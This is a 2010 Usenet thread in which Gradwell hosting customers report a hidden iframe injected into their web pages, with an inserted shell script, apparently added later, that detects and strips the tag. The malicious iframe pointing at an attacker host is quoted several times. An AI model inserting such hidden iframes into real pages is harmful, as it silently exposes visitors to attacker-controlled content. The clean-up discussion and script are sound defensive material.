susan
15.12.2010 - 07:53

Gradwell Sites Hacked?

Overnight our .html and .php pages have been modified to load in a
frame from gaccess.dynsite.net/blog/wp-content/0wn3d

This code has been added to our files:

<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
style="display:none"></iframe>

Anyone else seeing this?

Molly Mockford
15.12.2010 - 08:23
On Tue, 14 Dec 2010, susan <susan0nz@yahoo.co.uk> wrote:

> Overnight our .html and .php pages have been modified to load in a
> frame from gaccess.dynsite.net/blog/wp-content/0wn3d
>
> This code has been added to our files:
>
> <iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
> style="display:none"></iframe>
>
> Anyone else seeing this?

A week ago, Gradwell told me:

"We found that an outside source was able to breach a number of our
customers home spaces and install these .tmp files. The exploit in the
users homespace has been secured and we will be running daily seek and
destroy scripts, as well as securing our web servers. Tests will be
ongoing to investigate how this can be fully prevented in the future."

and then, in response to a further query from me:

"There have been no other exploits and we are currently running a daily
search and destroy script to identify any other possible breaches,
although we do not believe that there are."

Looks like their search and destroy script didn't find your case :-(

Check your root directory for spurious directories which may have
appeared there (at the same level as /webs/), and delete them. The
following directories, some with sub-directories, appeared in one of my
accounts (but not the other), all date-stamped 2nd December:

bin
db
doc
etc
include
inews
lib
log
man
spool
tmp

Also, and perhaps most importantly, check your list of FTP accounts for
any spurious account which may have appeared there, and delete it.

OK, it may be stable doors and horses, but it will clean up your account
from all the nasties which appeared in mine. (I was lucky that another
Gradwell customer alerted me, and the account could be cleaned up before
the perp actioned the hack.)
--
Molly Mockford

susan
15.12.2010 - 08:40
I don't see any of those directories in my folders, or any spurious
ftp accounts. I've changed my ftp password just in case.

I just checked your site at pagination.co.uk and it has the same code
injected at the bottom of the page, so I wonder if this is more of a
Gradwell-wide problem rather than someone gaining access to my
account?


"Dave {Reply Address In.Sig}"
15.12.2010 - 09:14
Molly Mockford wrote:

> On Tue, 14 Dec 2010, susan <susan0nz@yahoo.co.uk> wrote:
>
> > Overnight our .html and .php pages have been modified to load in a
> > frame from gaccess.dynsite.net/blog/wp-content/0wn3d
> >
> > This code has been added to our files:
> >
> > <iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
> > style="display:none"></iframe>
> >
> > Anyone else seeing this?
>
> A week ago, Gradwell told me:
>
> "We found that an outside source was able to breach a number of our
> customers home spaces and install these .tmp files. The exploit in the
> users homespace has been secured and we will be running daily seek and
> destroy scripts, as well as securing our web servers. Tests will be
> ongoing to investigate how this can be fully prevented in the future."
>
> and then, in response to a further query from me:
>
> "There have been no other exploits and we are currently running a daily
> search and destroy script to identify any other possible breaches,
> although we do not believe that there are."
>
> Looks like their search and destroy script didn't find your case :-(

It appears to have hit mine as well, based on a quick grep for 'iframe' :-(

Dave


Molly Mockford
15.12.2010 - 09:54
On Tue, 14 Dec 2010, susan <susan0nz@yahoo.co.uk> wrote:

> I don't see any of those directories in my folders, or any spurious
> ftp accounts. I've changed my ftp password just in case.
>
> I just checked your site at pagination.co.uk and it has the same code
> injected at the bottom of the page, so I wonder if this is more of a
> Gradwell-wide problem rather than someone gaining access to my
> account?

You're right, and in others of my sites that I've checked. So much for
Gradwell's assurances of search-and-destroy!
--
Molly Mockford


Molly Mockford
15.12.2010 - 10:01
On Wed, 15 Dec 2010, Molly Mockford <nospam@pagination.co.uk> wrote:

> On Tue, 14 Dec 2010, susan <susan0nz@yahoo.co.uk> wrote:
>
> > I don't see any of those directories in my folders, or any spurious
> > ftp accounts. I've changed my ftp password just in case.
> >
> > I just checked your site at pagination.co.uk and it has the same code
> > injected at the bottom of the page, so I wonder if this is more of a
> > Gradwell-wide problem rather than someone gaining access to my
> > account?
>
> You're right, and in others of my sites that I've checked. So much for
> Gradwell's assurances of search-and-destroy!

These altered files (*.html and *.php) are datestamped 15th December, so
this may have been a separate attack from the 2nd December one. But the
iframe exploit is very reminiscent of the last time, when (as far as I
remember, and I am happy to be corrected if wrong) Gradwell shared a
list of customer logins with a trusted third party who proved
untrustworthy.

All my passwords were changed after that. And all my passwords remain
secure at my end; the security breach must have been in Gradwell.
--
Molly Mockford

Molly Mockford
15.12.2010 - 10:27
Files of which I don't even have a local copy have been altered - e.g.
every Webalizer .html file, and every .php file in large database-driven
functions. It clearly needs to be cleaned up on-line; trying to upload
clean copies is totally impracticable. However, I am no Unix expert.
Can anybody come up with something which will run in the shell, and
check every .html and .php file for the string

<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
style="display:none"></iframe>

and delete it?
--
Molly Mockford

Geoff Berrow
15.12.2010 - 10:56
On Wed, 15 Dec 2010 08:54:19 +0000, Molly Mockford
<nospam@pagination.co.uk> wrote:

> > I just checked your site at pagination.co.uk and it has the same code
> > injected at the bottom of the page, so I wonder if this is more of a
> > Gradwell-wide problem rather than someone gaining access to my
> > account?
>
> You're right, and in others of my sites that I've checked. So much for
> Gradwell's assurances of search-and-destroy!

Be careful. Gradwell shut all my sites down without warning when I
reported stuff like this and told me to clean all my scripts and
files.

I have no sites hosted on Gradwell now.

I feel sort of vindicated. :)
--
Geoff Berrow (Put thecat out to email)
It's only Usenet, no one dies.
My opinions, not the committee's, mine.
Simple RFDs www.4theweb.co.uk/rfdmaker


Molly Mockford
15.12.2010 - 11:02
I have now spoken to Gradwell support, who say that their second-line
support are working on this. I emphasised the importance of letting us
know via this newsgroup, and pointed out that only they can really run a
full-scale clean-up script - we can't be expected to clean up Webalizer
files!

My partner has suggested that this is part of a WikiLeaks revenge attack
on Paypal, Mastercard or whatever, such that each time a compromised
page is accessed it adds to the DOS attacks; if this is so, the most
urgent pages to clean are those most frequently accessed, but I stress
this is only guesswork!
--
Molly Mockford

Richard Tibbetts
15.12.2010 - 11:22
On 15/12/2010 08:14, Dave {Reply Address In.Sig} wrote:


> It appears to have hit mine as well, based on a quick grep for 'iframe' :-(
>
> Dave


Mine too. All edits timed at 00:50 this morning. I've restored them
all - I wonder if they will stay uninfected?

Molly Mockford
15.12.2010 - 11:28
On Wed, 15 Dec 2010, Molly Mockford <nospam@pagination.co.uk> wrote
> But the iframe exploit is very reminiscent of the last time, when (as
> far as I remember, and I am happy to be corrected if wrong) Gradwell
> shared a list of customer logins with a trusted third party who proved
> untrustworthy.

It looks as though I may well have misremembered; looking back through
the old gradwell.support, I came across this link:

<http://blog.gradwell.net/2008/06/09/customer-ftp-and-website-security/>

(That time, though, it was only the top-level index file of each site
which was altered by the addition of the iframe exploit; now it's
throughout each site.)
--
Molly Mockford

Tony van der Hoff
15.12.2010 - 11:40
On 15/12/10 08:14, Dave {Reply Address In.Sig} wrote:
> It appears to have hit mine as well, based on a quick grep for 'iframe' :-(

Dave, what is the grep command?

--
Tony van der Hoff | mailto:tony@vanderhoff.org
Buckinghamshire, England |
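
Molly's request above for something that will run in the shell and strip the tag from every .html and .php file, and Tony's question about the grep command, as an added example. This is not code from the thread, from Gradwell or from any of the posters; the function names, the `--clean` flag and the web-root argument are my own. It assumes the tag was written into the files on a single line, as it appears in the posts apart from the newsreader's line wrap, and that the shell account has POSIX find, grep, sed and touch.

```shell
#!/bin/sh
# Added example, not code from the thread or from Gradwell: find every
# .html/.php file under a web root that carries the injected iframe, list
# the affected files, and strip the tag in place.
# Assumptions: the tag sits on one line in the files, exactly as quoted in
# the thread (the line wrap in the posting is a newsreader artefact), and
# the account has a POSIX shell with find, grep, sed and touch available.
set -u

# Cheap marker to pick out candidate files before anything is edited.
MARKER='gaccess\.dynsite\.net/blog/wp-content/0wn3d'

# Full tag as a sed BRE. '|' is used as the s/// delimiter below so the
# slashes need no escaping; [[:space:]]\{1,\} tolerates any whitespace
# between the two attributes.
TAG='<iframe src="http://gaccess\.dynsite\.net/blog/wp-content/0wn3d/"[[:space:]]\{1,\}style="display:none"></iframe>'

# Dry run: print the path of every infected .html/.php file under $1.
list_infected() {
    find "$1" -type f \( -name '*.html' -o -name '*.php' \) \
        -exec grep -l "$MARKER" {} + 2>/dev/null
}

# Strip the tag from every infected file under $1, keeping a .bak copy of
# each file touched. Prints the number of files cleaned.
strip_iframe() {
    list_infected "$1" | while IFS= read -r f; do
        cp -p "$f" "$f.bak" || continue
        # Write through a temp file and cat back so the original inode,
        # owner and mode survive (sed -i behaves differently on GNU and BSD).
        sed "s|$TAG||g" "$f" > "$f.tmp" && cat "$f.tmp" > "$f"
        rm -f "$f.tmp"
        printf '%s\n' "$f"
    done | wc -l | tr -d ' '
}

# Triage helper: list files under $1 modified after timestamp $2
# (YYYYMMDDhhmm, e.g. 201012150050 for the 00:50 edits mentioned in the
# thread). touch -t plus find -newer are POSIX; find -newermt is GNU-only.
modified_since() {
    ref=$(mktemp) || return 1
    touch -t "$2" "$ref"
    find "$1" -type f -newer "$ref"
    rm -f "$ref"
}

# Usage: sh clean_iframe.sh WEBROOT           dry run, list infected files
#        sh clean_iframe.sh WEBROOT --clean   strip the tag, keep .bak copies
if [ -n "${1:-}" ]; then
    if [ "${2:-}" = "--clean" ]; then
        printf '%s files cleaned\n' "$(strip_iframe "$1")"
    else
        list_infected "$1"
    fi
fi
```

Run the dry run first and read the list; then run with `--clean`. Two caveats: the `.bak` copies of `.php` files will be served as plain text by most hosts, so delete them once the cleaned files have been checked; and stripping the tag is clean-up only, since whatever wrote it still has write access to the home space, which is why the `modified_since` listing for the attack window (00:50 or 23:11 in the reports above) is worth running too, to catch anything that was dropped alongside the iframe.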

Andy
15.12.2010 - 11:46
In message <ZiiyF0enzGCNFweb@molly.mockford>, Molly Mockford
<nospam@pagination.co.uk> wrote
> []
> Check your root directory for spurious directories which may have
> appeared there (at the same level as /webs/), and delete them.

Is this a different type of account from mine? I have two sites, and
both offer me HTDOCS and LOGS when I log in; I can't go rootwards, and
these directories contain only what I put there.
--
Andy Taylor [Editor, Austrian Philatelic Society].
Visit <URL:http://www.austrianphilately.com>

John Hall
15.12.2010 - 11:58
In article
<df0f793c-eeb0-4c7e-bf69-c133bcd339d2@g26g2000vbi.googlegroups.com>,
susan <susan0nz@yahoo.co.uk> writes:
> Overnight our .html and .php pages have been modified to load in a
> frame from gaccess.dynsite.net/blog/wp-content/0wn3d
>
> This code has been added to our files:
>
> <iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
> style="display:none"></iframe>
>
> Anyone else seeing this?

My .html pages have also been modified, at 23:11 last night (the 14th).
Time to replace them with the copies on my own machine. Thanks for
flagging this up.
--
John Hall
"I look upon it, that he who does not mind his belly,
will hardly mind anything else."
Dr Samuel Johnson (1709-84)

Peter Gradwell
15.12.2010 - 12:04
Hi

On Dec 15, 7:23 am, Molly Mockford <nos...@pagination.co.uk> wrote:
> On Tue, 14 Dec 2010, susan <susan...@yahoo.co.uk> wrote:
> > Overnight our .html and .php pages have been modified to load in a
> > frame from gaccess.dynsite.net/blog/wp-content/0wn3d
> >
> > This code has been added to our files:
> >
> > <iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"
> > style="display:none"></iframe>
> >
> > Anyone else seeing this?

Yes, a number of customers' sites are suffering from these problems.

> A week ago, Gradwell told me:
>
> "We found that an outside source was able to breach a number of our
> customers home spaces and install these .tmp files. The exploit in the
> users homespace has been secured and we will be running daily seek and
> destroy scripts, as well as securing our web servers. Tests will be
> ongoing to investigate how this can be fully prevented in the future."

That's right. We have taken some advice and made a number of changes, but
there must be some sort of exploit in apache itself so we are also looking at
that, and its permissions model.

cheers
peter



